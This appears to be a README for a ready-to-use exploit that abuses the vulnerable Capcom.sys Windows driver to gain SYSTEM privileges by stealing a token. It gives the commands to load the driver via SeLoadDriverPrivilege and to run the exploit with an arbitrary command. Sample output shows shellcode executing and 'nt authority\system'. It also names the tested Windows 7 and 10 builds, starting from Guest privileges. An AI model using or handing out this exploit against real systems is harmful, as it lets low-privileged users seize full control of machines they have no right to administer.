This is a standalone exploit for a vulnerable feature in Capcom.sys. The feature is exposed through IOCTL and allows the attacker to execute an arbitrary function pointer with disabling SMEP. This exploit simply abuses the feature to perform token stealing to get the SYSTEM privileges, and then executes a supplied command with an elevated privilege.
For more details, see:
Load the Capcom.sys first:
> eoploaddriver.exe System\CurrentControlSet\MyService C:\full\path\to\Capcom.sys
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService
NTSTATUS: 00000000, WinError: 0
Then execute this exploit:
> ExploitCapcom.exe 'whoami'
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000064
[*] Shellcode was placed at 000002247B9B0008
[+] Shellcode was executed
[+] Token stealing was successful
[+] Command Executed
nt authority\system
Everything you may need is there.
- Capcom.sys (SHA1: c1d5cf8c43e7679b782630e93f5e6420ca1749a7)
- Windows 7 (x64) SP1 with the Guest privileges
- Windows 10 (x64) Build 14393 with the Guest privileges
This software is released under the MIT License, see LICENSE.